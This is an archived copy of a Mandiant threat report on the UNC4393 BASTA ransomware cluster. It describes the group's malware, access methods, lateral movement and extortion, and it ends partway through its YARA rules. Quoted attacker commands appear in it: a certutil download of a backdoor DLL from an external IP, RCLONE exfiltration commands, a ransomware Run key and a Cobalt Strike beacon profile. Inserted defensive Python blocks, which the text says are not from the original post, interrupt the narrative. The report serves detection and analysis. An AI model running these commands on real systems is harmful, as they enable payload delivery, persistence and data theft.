{
	"id": "480698aa-2435-483c-8b43-26ea5a8175c6",
	"created_at": "2026-04-06T00:14:46.853793Z",
	"updated_at": "2026-04-10T03:31:36.14837Z",
	"deleted_at": null,
	"sha1_hash": "11aff090bd59803ed7a2e8cf4eab0a9233176e67",
	"title": "UNC4393 Goes Gently into the SILENTNIGHT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 720244,
	"plain_text": "UNC4393 Goes Gently into the SILENTNIGHT\r\nBy Mandiant\r\nPublished: 2024-07-29 · Archived: 2026-04-05 15:50:01 UTC\r\nWritten by: Josh Murchie, Ashley Pearson,  Joseph Pisano,  Jake Nicastro,  Joshua Shilko, Raymond Leong\r\nOverview\r\nIn mid-2022, Mandiant's Managed Defense detected multiple intrusions involving QAKBOT, leading to the\r\ndeployment of BEACON coupled with other pre-ransomware indicators. This marked Mandiant's initial\r\nidentification of UNC4393, the primary user of BASTA ransomware. Mandiant has responded to over 40 separate\r\nUNC4393 intrusions across 20 different industry verticals. While healthcare organizations have not traditionally\r\nbeen a focus for UNC4393, several breaches in the industry this year indicate a possible expansion of their\r\ninterests. However, this represents only a fraction of the cluster's victims, with the Black Basta data leak site\r\npurporting over 500 victims since inception.\r\nOver the course of this blog post, Mandiant will detail the evolution of UNC4393's operational tactics and\r\nmalware usage throughout its active lifespan, with a focus on the period following the QAKBOT botnet takedown.\r\nWe will highlight the cluster's transition from readily available tools to custom malware development as well as its\r\nevolving reliance on access brokers and diversification of initial access techniques.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 1 of 17\n\nFigure 1: UNC4393 intrusion lifecycle\r\nAttribution and Targeting\r\nUNC4393 is a financially motivated threat cluster, and the primary user of BASTA ransomware, tracked since\r\nmid-2022 but likely active since early 2022 based on activity on the BASTA DLS.  The group has overwhelmingly\r\nleveraged initial access gained via UNC2633 and UNC2500 QAKBOT botnet infections to deploy BASTA\r\nransomware. 
QAKBOT is typically distributed via phishing emails containing malicious links or attachments. In\r\nsome cases, HTML smuggling has also been used to distribute ZIP files containing IMG files that house LNK files\r\nand QAKBOT payloads. \r\nMandiant suspects BASTA operators maintain a private or small, closed-invitation affiliate model whereby only\r\ntrusted third-party actors are provided with use of the BASTA encryptor. Unlike traditional ransomware-as-a-service (RaaS), BASTA is not publicly marketed and its operators do not appear to actively recruit affiliates to\r\ndeploy the ransomware. Instead, they focus on acquiring initial access via partnerships or purchases in\r\nunderground communities. This deviates from traditional RaaS models, which focus on the ransomware\r\ndevelopment and related services such as the data leak site (DLS) that are provided to affiliates in exchange for\r\ndirectly distributing the ransomware. While UNC4393 is the only currently active threat cluster deploying BASTA\r\nthat Mandiant tracks, we cannot rule out the possibility that other, vetted threat actors may also be given access to\r\nthe encryptor.\r\nThe hundreds of BASTA ransomware victims claimed on the DLS appear credible given UNC4393’s rapid\r\noperational tempo. With a median time to ransom of approximately 42 hours, UNC4393 has demonstrated\r\nproficiency in quickly performing reconnaissance, data exfiltration, and completing actions on objectives.\r\n…And Then There Were Two\r\nAt the onset of the BASTA ransomware deployment in 2022, Mandiant initially tracked associated activity similar\r\nto other RaaS models with operators and affiliates. Caution was exercised in attributing activity to a single cluster\r\ngiven the possibility of disparate actors within a RaaS model. 
Through our merge research methodology, Mandiant\r\nconsolidated its tracking to two primary clusters: UNC4393 and UNC3973. While UNC4393 encompasses the\r\nmajority of BASTA-related activity, UNC3973 demonstrates unique attributes and tactics, techniques, and\r\nprocedures (TTPs), which warrant separate tracking. This consolidation suggests that the operators of BASTA\r\nransomware work with a highly exclusive and tightly knit group. \r\nMalware Observed\r\nMandiant has observed UNC4393 deploying the following malware:\r\nMalware family: BASTA\r\nDescription: BASTA is a ransomware written in C++ that encrypts local files. The ransomware is capable of deleting volume shadow copies. BASTA generates a random ChaCha20 or XChaCha20 key to encrypt each file; the key is encrypted and appended to the end of the file. The malware has been observed using .basta as the extension for encrypted files; however, some samples have used a random nine-character alphanumeric extension.\r\nMalware family: SYSTEMBC\r\nDescription: SYSTEMBC is a tunneler written in C that retrieves proxy-related commands from a command-and-control (C2 or C\u0026C) server using a custom binary protocol over TCP. A C2 server directs SYSTEMBC to act as a proxy between the C2 server and a remote system. SYSTEMBC is also capable of retrieving additional payloads via HTTP. Some variants may utilize the Tor network for this purpose. Downloaded payloads may be written to disk or mapped directly into memory prior to execution. SYSTEMBC is often utilized to hide network traffic associated with other malware families. Observed families include DANABOT, SMOKELOADER, and URSNIF.\r\nMalware family: KNOTWRAP\r\nDescription: KNOTWRAP is a memory-only dropper written in C/C++ that can execute an additional payload in memory. Within a designated Portable Executable (PE) section, the embedded payload contents are compressed and encrypted using a custom stream cipher. The secondary payload is executed in the address space of the calling process. Extended capabilities involve code obfuscation, dynamic resolution of API function addresses, and the parsing of PE file structures. KNOTWRAP capabilities and/or features could be subject to variations based on the compiled build.\r\nMalware family: KNOTROCK\r\nDescription: KNOTROCK is a .NET-based utility that creates a symbolic link on network shares specified in a local text file. After creating each symbolic link, KNOTROCK executes what is presumably a BASTA ransomware executable and provides it with the path to the newly created symbolic link.\r\nMalware family: DAWNCRY\r\nDescription: DAWNCRY is a memory-only dropper that decrypts an embedded resource into memory with a hard-coded key of 65 69 55 56 79 72 79 67 6C 3E 58 45 2A 5E 71 78 45 59 69 49 56 56 61 38 34 4C. The resource contains three portions of shellcode, one of which contains a DAVESHELL loader. DAWNCRY also contains a PDB path of SophosFSTelemetry.pdb.\r\nMalware family: PORTYARD\r\nDescription: PORTYARD is a tunneler that establishes a connection to a hard-coded C2 server using a custom binary protocol over TCP. It accepts commands to establish a TCP connection to a relay server and proxies traffic between the hard-coded C2 and relay server via TCP. It creates a thread on the system to monitor for incoming connections from the C2, and within the thread it checks the first response to validate it.\r\nMalware family: COGSCAN\r\nDescription: COGSCAN is a .NET reconnaissance assembly used to gather a list of hosts available on the network.\r\nTable 1: UNC4393-deployed malware\r\nInitial Access Brokers\r\nEarly UNC4393 activity nearly exclusively involved leveraging existing QAKBOT infections delivered via\r\nphishing for initial access. 
In late 2023, several months after the QAKBOT infrastructure takedown by the FBI\r\nand the United States Justice Department, UNC4393 began leveraging other distribution clusters for initial access,\r\nspecifically those delivering DARKGATE, again via phishing. This relationship was short-lived, however, as only\r\na few months later UNC4393 was observed following successful UNC5155 SILENTNIGHT intrusions. Taken\r\ntogether, these shifts demonstrate UNC4393's willingness to cooperate with multiple distribution clusters to complete its\r\nactions on objectives.\r\nSILENTNIGHT is a C/C++ backdoor that communicates via HTTP/HTTPS and may utilize a domain generation\r\nalgorithm (DGA) for C2. Its plug-in framework allows for versatile functionality, including system control,\r\nscreenshot capture, keylogging, file management, and cryptocurrency wallet access. It also targets credentials\r\nthrough browser manipulation.\r\nSILENTNIGHT was first observed in late 2019. Mandiant then saw a brief lull in its usage before a resurgence in mid-2021, lasting only a few months. This was followed by a significant hiatus that lasted until late 2023. The most\r\nrecent surge of SILENTNIGHT activity, beginning earlier this year, has been primarily delivered via malvertising.\r\nThis marked a notable shift away from phishing as UNC4393's only known means of initial access.\r\nInitial Foothold\r\nAfter gaining access to target environments, the remainder of UNC4393 operations consist of a combination of\r\nliving-off-the-land (LotL) techniques and custom malware. \r\nOne consistently observed method for establishing and maintaining a foothold was DNS BEACON. UNC4393 is\r\nknown to reuse variations of the following unique domain-naming conventions:\r\nh.dns. + C2 Domain\r\nridoj4. + \u003c8 character string\u003e + .dns. + C2 Domain\r\njzz. + \u003c8 character string\u003e + .dns. 
+ C2 Domain\r\nwnh. + \u003c8 character string\u003e + .dns. + C2 Domain\r\nAccording to Cobalt Strike documentation, DNS beacons and listeners can be customized using Malleable C2\r\nprofiles. Each unique subdomain can be configured to perform a respective action when called, so the fixed prefixes\r\nabove are consistent with operator-chosen values for these options.\r\ndns-beacon {\r\n    # DNS subhost override options added in 4.3:\r\n    set beacon \"doc.bc.\";\r\n    set get_A \"doc.1a.\";\r\n    set get_AAAA \"doc.4a.\";\r\n    set get_TXT \"doc.tx.\";\r\n    set put_metadata \"doc.md.\";\r\n    set put_output \"doc.po.\";\r\n    set ns_response \"zero\";\r\n}\r\nFigure 2: Example Cobalt Strike DNS Beacon Malleable C2\r\nWhile UNC4393 has been observed deploying BEACON early in its intrusions, the group often leverages the\r\npayload throughout its operations.\r\nBeginning in early 2024, UNC4393 was observed deploying a multi-stage infection chain initiated by\r\nDAWNCRY, followed by a DAVESHELL dropper, and ultimately leading to the PORTYARD tunneler.\r\nDAWNCRY is a memory-only dropper that decrypts an embedded resource into memory, which contains the\r\nfollowing three portions of shellcode:\r\n1. [First 0x60C bytes] - A DAVESHELL dropper\r\n2. [Bytes 0x60D - 0x19F0] - The main payload, only so far seen as the tunneler PORTYARD. This tunneler\r\ncreates a thread on the system to monitor for incoming connections from the C2, and within the thread\r\nchecks the first response to validate it. It expects to receive one of two commands from the C2 server to\r\nestablish a connection with the relay server:\r\n   Command \"1\" receives the relay server formatted as an IPv4 address and port.\r\n   Command \"3\" receives the relay server formatted as an FQDN and port.\r\n3. 
[Bytes 0x1A00 - 0x29F2] - A second portion of shellcode, starting with the string \"dave\".\r\nIf neither PORTYARD command is present, the tunneler assumes the connection is already established and begins\r\nmonitoring for data from either the relay server or the original hard-coded C2 server, proxying data between the two\r\nvia TCP.\r\nFigure 3: DAWNCRY and PORTYARD deployment\r\nInternal Recon\r\nAfter gaining initial access, UNC4393 has commonly relied upon open-source tools such as BLOODHOUND,\r\nADFIND, and PSNMAP to assist in mapping out victim networks and identifying ways to either laterally move or\r\nescalate privileges. UNC4393 will frequently store these tools within the C:\\Users\\Public or C:\\Windows\r\nfolders. We have also observed UNC4393 utilize a scanning tool Mandiant tracks as COGSCAN. \r\nCOGSCAN is a .NET reconnaissance tool used to enumerate hosts on a network and gather system information.\r\nWe suspect UNC4393 refers to this tool internally as GetOnlineComputers due to the following PDB path present\r\nin the sample:\r\nC:\\Users\\ehgrhr\\source\\repos\\GetOnlineComputers\\GetOnlineComputers\\obj\\x86\\Release\\goc.pdb\r\nFigure 4: Example COGSCAN PDB path\r\nWhile individual samples of COGSCAN contain significantly similar PDB paths with the exception of the\r\nusername, all end with goc.pdb.\r\nCOGSCAN creates the following four distinct artifacts on the endpoint:\r\nC:\\users\\public\\online.txt\r\nC:\\users\\public\\pc.txt\r\nC:\\users\\public\\pc_sorted.txt\r\n%CD%\\ldap.txt\r\nWithin these four files, COGSCAN collects the following information:\r\nEndpoint information\r\n  Machine name\r\n  IPv4\r\n  Operating system and revision\r\n  Last patch applied\r\n  Sessions\r\nDomains and LDAP information\r\nEndpoint function\r\n  Domain controller\r\n  Webserver\r\nScans of multiple registry keys\r\n  HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\\r\n  HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Component Based Servicing\\Packages\r\n  HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\r\nLateral Movement and Persistence\r\nUNC4393 has predominantly relied on SMB BEACON and Remote Desktop Protocol (RDP) to carry out its\r\nlateral movement. As mentioned previously, BEACON usage is ubiquitous in nearly every UNC4393 intrusion.\r\nThe group has demonstrated a predilection for usage of the remote execution via Windows Management\r\nInstrumentation (WMI) capability within Cobalt Strike to spread and launch malware or other tools during the\r\ncourse of its intrusions. For example, in one case, the BASTA encryptor was staged on hosts to be encrypted\r\nbefore being executed via WMI en masse on over 100 systems within 10 minutes. \r\nFurthermore, Mandiant observed UNC4393's preference for establishing persistence through the use of a variety\r\nof publicly available remote monitoring and management (RMM) software in its early operations. Specifically, we\r\nobserved UNC4393 utilize ANYDESK, ATERA, SPLASHTOP, SCREENCONNECT, SUPREMO, and\r\nNETSUPPORT. Generally, these tools were saved and launched from C:\\ProgramData, C:\\Windows\\Temp, or\r\nC:\\Dell. \r\nHowever, it is worth noting that these tools seem to have fallen out of favor from the group's preferred TTPs since\r\nlate 2022. Mandiant observed this is the approximate timeframe in which SYSTEMBC tunneler usage began\r\nrising for the group, potentially indicating a shift in operational preferences. Common directories for storing\r\nSYSTEMBC PE binaries include C:\\ProgramData, C:\\Windows, and C:\\Users\\Public. 
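The DNS BEACON naming conventions listed under Initial Foothold above translate directly into a hunting query. The following Python is an added example written for this page, not code from the original post or from Mandiant: it parses constructed resolver query-log lines (the log layout is an assumption; adapt the QUERY_LOG_LINE pattern to your resolver), matches the four prefixes, and groups hits by the inferred C2 domain. The assumption that the 8-character label is alphanumeric is mine; the post only gives its length.

```python
import re
from collections import defaultdict

# The four naming conventions listed under Initial Foothold: a fixed prefix,
# optionally an 8-character label, then the literal 'dns' label, then the C2
# domain. Assumption (not stated on the page): the 8-character label is
# alphanumeric. Matching is case-insensitive because DNS names are.
UNC4393_DNS_BEACON = re.compile(
    r'^(?:h[.]dns|(?:ridoj4|jzz|wnh)[.][a-z0-9]{8}[.]dns)'
    r'[.](?P<c2>[a-z0-9-]+(?:[.][a-z0-9-]+)+)$',
    re.IGNORECASE,
)

# Constructed query-log layout (assumption; adapt to your resolver's format):
#   <timestamp> <client_ip> <qtype> <qname>
QUERY_LOG_LINE = re.compile(
    r'^(?P<ts>[^ ]+) +(?P<client>[^ ]+) +(?P<qtype>[A-Z]+) +(?P<qname>[^ ]+)$'
)


def classify_qname(qname):
    """Return the inferred C2 domain when qname follows one of the UNC4393
    DNS BEACON conventions, otherwise None. A trailing dot (FQDN form) is
    tolerated so resolver logs that emit it still match."""
    m = UNC4393_DNS_BEACON.match(qname.strip().rstrip('.'))
    return m.group('c2').lower() if m else None


def hunt_dns_log(lines):
    """Group matching queries by inferred C2 domain.

    Returns {c2: {'clients': [sorted client IPs], 'count': n}} so an analyst
    sees at once how many hosts are beaconing to each candidate C2."""
    hits = defaultdict(lambda: {'clients': set(), 'count': 0})
    for line in lines:
        m = QUERY_LOG_LINE.match(line.strip())
        if not m:
            continue  # malformed or unrelated line
        c2 = classify_qname(m.group('qname'))
        if c2 is None:
            continue
        hits[c2]['clients'].add(m.group('client'))
        hits[c2]['count'] += 1
    return {c2: {'clients': sorted(v['clients']), 'count': v['count']}
            for c2, v in hits.items()}


# Constructed sample log; the domains are placeholders, not real UNC4393 C2.
SAMPLE_QUERY_LOG = [
    '2024-03-04T10:01:02Z 10.1.2.3 A h.dns.example-c2.test',
    '2024-03-04T10:01:03Z 10.1.2.3 TXT ridoj4.a1b2c3d4.dns.example-c2.test',
    '2024-03-04T10:01:04Z 10.1.2.9 A jzz.zz9yx8w7.dns.example-c2.test.',
    '2024-03-04T10:01:05Z 10.1.2.9 AAAA wnh.ab12cd34.dns.other-c2.test',
    '2024-03-04T10:01:06Z 10.1.2.3 A www.example.test',
    '2024-03-04T10:01:07Z 10.1.2.3 A jzz.short.dns.example-c2.test',
]

if __name__ == '__main__':
    for c2, info in hunt_dns_log(SAMPLE_QUERY_LOG).items():
        print(c2, info['count'], ','.join(info['clients']))
```

The h.dns. form carries no random label, so a legitimate host literally named h.dns.<yourdomain> would match; treat a hit as a lead to confirm with query volume, TXT/AAAA record types and the sample's Malleable C2 profile rather than as a verdict on its own.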
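For the DAWNCRY chain described above, the following Python is an added example (not Mandiant's tooling or code from the post) that applies the hard-coded key from Table 1 to a resource and carves the three regions at the offsets the post gives. Repeating-key XOR is an assumption inferred from the stack-string key and the XOR loop the M_Dropper_DAWNCRY_1 rule below matches; the post does not state the cipher. The sample resource is constructed filler, not real shellcode.

```python
# Key recovered from the DAWNCRY stack string (Table 1 / the YARA rule below).
DAWNCRY_KEY = bytes.fromhex(
    '65 69 55 56 79 72 79 67 6C 3E 58 45 2A 5E 71 78 45 59 69 49 56 56 61 38 34 4C'
)

# Offsets of the three shellcode portions exactly as the post lists them. The
# one-byte gap at 0x60C and the gap 0x19F1..0x19FF are kept, not guessed over.
DAWNCRY_LAYOUT = (
    ('daveshell_dropper', 0x000, 0x60C),    # first 0x60C bytes
    ('main_payload', 0x60D, 0x19F1),        # bytes 0x60D..0x19F0 (PORTYARD so far)
    ('second_shellcode', 0x1A00, 0x29F3),   # bytes 0x1A00..0x29F2, begins 'dave'
)
RESOURCE_MIN_LEN = DAWNCRY_LAYOUT[-1][2]


def xor_decrypt(blob, key=DAWNCRY_KEY):
    """Repeating-key XOR. Assumption: the key is cycled byte-wise over the whole
    resource; the post only says the resource is decrypted with this key, and
    the rule names an XOR loop, so the schedule is inferred, not confirmed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def carve_dawncry_resource(decrypted):
    """Split a decrypted resource into the three documented regions and check
    the 'dave' marker at 0x1A00. A ValueError is the signal that the key or
    the layout does not fit, i.e. a different variant or a wrong guess."""
    if len(decrypted) < RESOURCE_MIN_LEN:
        raise ValueError('resource shorter than the documented layout')
    parts = {name: decrypted[start:end] for name, start, end in DAWNCRY_LAYOUT}
    if not parts['second_shellcode'].startswith(b'dave'):
        raise ValueError('no dave marker at 0x1A00; wrong key or unknown variant')
    return parts


def extract(resource_bytes):
    """Decrypt then carve; returns {region_name: bytes}."""
    return carve_dawncry_resource(xor_decrypt(resource_bytes))


def build_sample_resource():
    """Constructed stand-in resource (NOT real shellcode): NOP filler with
    recognisable tags at each region start, encrypted with the DAWNCRY key."""
    plain = bytearray(bytes([0x90]) * RESOURCE_MIN_LEN)
    plain[0x000:0x009] = b'DAVESHELL'
    plain[0x60D:0x615] = b'PORTYARD'
    plain[0x1A00:0x1A04] = b'dave'
    return xor_decrypt(bytes(plain))   # XOR is symmetric: encrypt == decrypt


if __name__ == '__main__':
    for name, blob in extract(build_sample_resource()).items():
        print(name, hex(len(blob)), blob[:9])
```

On a real sample, feed extract() the raw resource bytes (for example from a PE resource parser); if it raises, check whether the variant uses a different key schedule before assuming the key itself changed.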
In mid-2023, there was a further shift in TTPs: SYSTEMBC usage dropped off with seemingly no replacement until early 2024,\r\nwhen PORTYARD tunneler usage began.\r\nIn one observed instance, UNC4393 encountered issues with endpoint antivirus when attempting to establish\r\npersistence on a host. They circumvented this by abusing the native Windows command-line utility certutil to\r\ndownload a SILENTNIGHT payload.\r\nC:\\WINDOWS\\system32\\certutil.exe -urlcache -split -f http://179.60.149.235/KineticaSurge.dll C:\\Users\\Public\\KineticaSurge.dll\r\nFigure 5: UNC4393 command downloading an UNC5155 SILENTNIGHT binary\r\nRansomware and Extortion\r\nUNC4393's goal is to gather as much data as quickly as possible, followed by exfiltration of the collected data to\r\nengage in multi-faceted extortion, leveraging the threat of data leakage to pressure victims into paying ransom\r\ndemands. UNC4393 is often observed utilizing RCLONE for its data theft; RCLONE is a command-line program\r\nthat allows the user to manage files on a variety of cloud storage platforms.\r\nIn order to obscure its activity, UNC4393 commonly masquerades the RCLONE binaries as programs that could\r\nappear at first glance to be legitimate system utilities:\r\nC:\\Windows\\system32\\cmd.exe /C taskenq.exe --config ssd.conf --max-size 99M --max-age 3y --transfers=99 --no-check-certificate copy \"\\\\\u003cREDACTED\u003e\\\u003cREDACTED\u003e$\" \u003cREMOTE SHARE\u003e\r\nC:\\Windows\\system32\\cmd.exe /C tasksend.exe --config cfg.conf --max-size 99M --max-age 7y --transfers=199 --no-check-certificate copy \"\\\\\u003cREDACTED\u003e\\M$\\Users\" \u003cREMOTE SHARE\u003e\r\nFigure 6: Example RCLONE exfiltration commands\r\nInitially, UNC4393 employed a more manual approach to deploying its encryptor. 
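The certutil download in Figure 5 and the masqueraded RCLONE commands in Figure 6 share a property: the binary name is unreliable, but the arguments are not. The following Python is an added example written for this page (not code from the post or from Mandiant) that flags process-creation command lines on those arguments. The sample command lines are constructed to mirror the figures, using a TEST-NET address and placeholder share names rather than the post's indicators.

```python
import ntpath
import shlex

# Long flags RCLONE accepts; the two figures use --config, --max-size, --max-age,
# --transfers and --no-check-certificate. Two or more plus a transfer verb is
# the fingerprint, whatever the binary has been renamed to.
RCLONE_FLAGS = {'--config', '--transfers', '--max-size', '--max-age',
                '--no-check-certificate'}
RCLONE_VERBS = {'copy', 'sync', 'move', 'copyto', 'moveto'}


def tokenize(cmdline):
    """Split a Windows command line. posix=False keeps backslashes literal and
    leaves quotes attached, which is what we want for path-heavy cmd lines."""
    return shlex.split(cmdline, posix=False)


def unwrap_cmd(tokens):
    """Drop a leading 'cmd.exe /C' (or /K) wrapper so the real image comes first."""
    if (len(tokens) > 2 and ntpath.basename(tokens[0]).lower() == 'cmd.exe'
            and tokens[1].lower() in ('/c', '/k')):
        return tokens[2:]
    return tokens


def analyze_cmdline(cmdline):
    """Return [(technique, image_name), ...] for one process command line.
    An empty list means nothing from this post's playbook was seen."""
    tokens = unwrap_cmd(tokenize(cmdline))
    if not tokens:
        return []
    image = ntpath.basename(tokens[0]).lower()
    args = [t.lower() for t in tokens[1:]]
    findings = []

    # Figure 5: certutil -urlcache [-split] -f <url> <dest> is a LotL download.
    if (image == 'certutil.exe' and '-urlcache' in args and '-f' in args
            and any(a.startswith(('http://', 'https://')) for a in args)):
        findings.append(('certutil_download', image))

    # Figure 6: RCLONE flags under an innocuous name (taskenq.exe, tasksend.exe).
    flag_names = {a.split('=', 1)[0] for a in args if a.startswith('--')}
    if len(flag_names & RCLONE_FLAGS) >= 2 and any(a in RCLONE_VERBS for a in args):
        technique = 'rclone_exfil' if image.startswith('rclone') else 'masqueraded_rclone'
        findings.append((technique, image))
    return findings


def hunt_process_events(cmdlines):
    """Map each suspicious command line to its findings; clean lines are dropped."""
    out = {}
    for cmdline in cmdlines:
        findings = analyze_cmdline(cmdline)
        if findings:
            out[cmdline] = findings
    return out


# Constructed process-creation command lines modelled on Figures 5 and 6
# (TEST-NET address and placeholder names, not the post's IOCs).
SAMPLE_CMDLINES = [
    'C:\\WINDOWS\\system32\\certutil.exe -urlcache -split -f http://192.0.2.10/payload.dll C:\\Users\\Public\\payload.dll',
    'C:\\Windows\\system32\\cmd.exe /C taskenq.exe --config ssd.conf --max-size 99M --max-age 3y --transfers=99 --no-check-certificate copy "\\\\fileserver\\share$" remote:bucket',
    'C:\\Windows\\system32\\cmd.exe /C rclone.exe --config cfg.conf --transfers=8 copy D:\\data remote:bucket',
    'C:\\WINDOWS\\system32\\certutil.exe -hashfile C:\\Windows\\Temp\\setup.msi SHA256',
    'C:\\Windows\\System32\\robocopy.exe D:\\data E:\\backup /E',
]

if __name__ == '__main__':
    for cmdline, findings in hunt_process_events(SAMPLE_CMDLINES).items():
        print(findings, '<-', cmdline)
```

Wire this to EDR process-creation telemetry: --config plus two transfer flags with a copy verb survives the rename, and certutil with -urlcache, -f and a URL is rarely legitimate on a workstation.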
That manual approach included direct\r\ninvocation of the BASTA binary from C:\\Windows or C:\\Users\\Public. The group has also been observed\r\nusing registry Run keys to launch the binary:\r\n\u003cHIVE\u003e\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Skype --\u003e\r\nC:\\Windows\\Basta_Ransomware.exe\r\nFigure 7: Windows Registry key to run BASTA ransomware\r\nIn late 2023, UNC4393 began leveraging KNOTROCK, a custom .NET-based utility that creates a symbolic link\r\non network shares specified in a local text file. After creating each symbolic link, KNOTROCK executes a\r\nBASTA ransomware executable and provides it with the path to the newly created symbolic link. Ultimately,\r\nKNOTROCK serves a dual purpose: it assists the existing BASTA encryptor by providing network\r\ncommunication capabilities and streamlines operations by proactively mapping out viable network paths, thereby\r\nreducing deployment time and accelerating the encryption process. KNOTROCK represents an evolution in\r\nUNC4393's operations, augmenting its capabilities by expediting the encryption process to enable larger-scale\r\nattacks and significantly decreasing its time to ransom.\r\nInterestingly, on two separate occasions this group gave up entirely when attempting to encrypt its target. If the\r\nexecution of its ransomware binary fails, Mandiant has observed that UNC4393 will effectively stop attempting to\r\nransom and cease its operation. Taken together with the number of victims that UNC4393 purports on\r\nits data leak site, it is plausible that the number of ongoing intrusions the group is actively working at one time\r\nnecessitates shifting priorities to other victims when encountering friction. 
That being said, an unsuccessful\r\nransom attempt does not ensure future immunity; Mandiant has observed UNC4393 retargeting previously\r\ncompromised environments months after a failed BASTA deployment. \r\nConclusion\r\nUNC4393 has proven to be an adaptable and prolific threat actor in the cybercrime landscape. Its evolution from\r\nopportunistic QAKBOT infections to strategic partnerships with initial access brokers demonstrates a willingness\r\nto diversify and optimize its operations. Notably, while BASTA has remained among the most active DLSs that we track, the\r\nnumber of victims has steadily declined in recent months (Figure 8). Although July is not yet over, with less than a\r\nweek remaining, any significant change to the downward trend seems unlikely. It is plausible that this decline\r\nreflects difficulties in obtaining a reliable stream of initial access. \r\nWhile its early reliance on readily available tools has shifted towards custom malware development, its core focus\r\non efficient data exfiltration and multi-faceted extortion remains constant. Further, the transition from manual\r\nransomware deployment to the development of KNOTROCK exemplifies UNC4393's commitment to improving\r\nits tactics. This, combined with its swift operational tempo, poses a significant challenge to defenders. The\r\ncluster's historical avoidance of healthcare institutions and its global reach further underscore its calculated and financially\r\ndriven approach.\r\nAs the threat landscape continues to evolve, understanding the intricacies of UNC4393's operations becomes\r\ncrucial for organizations seeking to protect themselves. 
UNC4393's ability to adapt, innovate, and leverage\r\nvarious tools and techniques highlights the need for proactive and robust security measures.\r\nFigure 8: Identified listings on the BASTA DLS\r\nCampaign Tracking\r\nMandiant has tracked three distinct campaigns related to UNC4393 operations since 2022, with additional\r\nindicators and context available to Google Threat Intelligence customers:\r\nCampaign 22-053\r\nIn November 2022, Mandiant identified multiple intrusions attributed to UNC4393 where BASTA ransomware\r\nwas deployed, and initial network access was obtained via malicious emails distributed by UNC2633 delivering\r\nQAKBOT. After obtaining access from UNC2633, UNC4393 deployed various tools, including Cobalt Strike\r\nBEACON and the SYSTEMBC tunneler. UNC4393 then exfiltrated data using RCLONE and deployed BASTA\r\nransomware. Notably, in some cases UNC4393 monetized access within a few days of obtaining access to the\r\nenvironment.\r\nOur findings are consistent with Mandiant’s prior observation that actors currently distributing BASTA show\r\nnotable TTP overlaps with intrusion operators that were previously affiliated with the historical TRICKBOT and\r\nCONTI ecosystems. \r\nCampaign 23-053\r\nSince at least early September 2023, UNC4393 has leveraged UNC2500 DARKGATE infections to obtain access\r\nto victim networks for BASTA ransomware operations. In at least one case, UNC4393 assumed control of a host\r\nwithin several hours of the initial DARKGATE deployment, then proceeded to deploy a Domain Name System\r\n(DNS)-based Cobalt Strike BEACON payload to establish a foothold. 
UNC4393 used PsExec and Windows\r\nAdmin Shares to move across the network environment, deployed the RCLONE command-line utility to exfiltrate\r\ndata, then manually launched a BASTA payload stored on a compromised Windows server. Historically,\r\nUNC4393 has leveraged access obtained by distribution threat clusters, including UNC2500 and UNC2633, to\r\ndeploy BASTA ransomware and to engage in data theft extortion.\r\nCampaign 24-018\r\nBeginning in late February 2024, UNC4393 was observed conducting data theft extortion operations and\r\ndeploying BASTA ransomware. In cases where the initial entry vector was determined, threat actors used stolen\r\ncredentials or relied on brute-force methods to authenticate with externally facing network appliances or servers.\r\nAfter gaining access, UNC4393 leveraged both proprietary and publicly available malware to deploy other code\r\nfamilies, establish a foothold, and conduct network reconnaissance. During intrusions, malware such as\r\nBEACON, COGSCAN, KNOTWRAP, KNOTROCK, PORTYARD, POWERSPLOIT, and POWERVIEW were\r\nused. \r\nSubsequent access to other internal systems and/or lateral movement were primarily achieved through remote\r\nservices, including Windows administrative shares, RDP, and Server Message Block (SMB). In certain cases, prior\r\nto the deployment of ransomware, threat actors collected sensitive data and exfiltrated it via RCLONE for use in\r\nlater extortion attempts. The first appearance of BASTA samples in the affected networks ranged from a few days\r\nto weeks after the initial access, impacting Windows and ESXi systems. 
While UNC4393's TTPs and\r\nmonetization methods remain relatively consistent from previous operations, the group appears to be diversifying\r\nits initial access sources.\r\nDetection and Mitigation\r\nTo assist the wider community in hunting and identifying activity outlined in this blog post, we have included a\r\nsubset of these indicators of compromise (IOCs) in this post, and in a publicly available GTI Collection.\r\nAcknowledgements\r\nWe would like to acknowledge the contributions of Paul Tarter, and the other members of the FLARE team, for\r\nassisting with our understanding of the aforementioned malware. Additionally, we would like to thank the efforts\r\nof the Mandiant Research Team in assisting with our understanding of UNC4393.\r\nYARA Rules\r\nBASTA\r\nrule M_Ransomware_BASTA_1\r\n{\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 11 of 17\n\nmeta:\r\n author = \"Mandiant”\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n md5 = \"3f400f30415941348af21d515a2fc6a3\"\r\n platforms = \"Windows\"\r\n malware_family = \"BASTA\"\r\n strings:\r\n $domain = \"aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt\r\n33s77xypi7nypxyd\"\r\n $keyiso = \"keyiso\" nocase wide\r\n $note = \"Your company id for log in\"\r\n condition:\r\n uint16(0) == 0x5A4D and (all of them)\r\n}\r\nrule M_Ransomware_BASTA_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n platforms = \"Windows\"\r\n malware_family = \"BASTA\"\r\n strings:\r\n$str1 = \"ATTENTION!\"\r\n$str2 = \"https://basta\"\r\n$str3 = \"network has been breached\"\r\n$str5 = \"instructions_read_me.txt\"\r\n$str6 = \"Do not modify, rename or delete files\"\r\ncondition:\r\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) ==\r\n0x00004550 and all of them\r\n}\r\nrule 
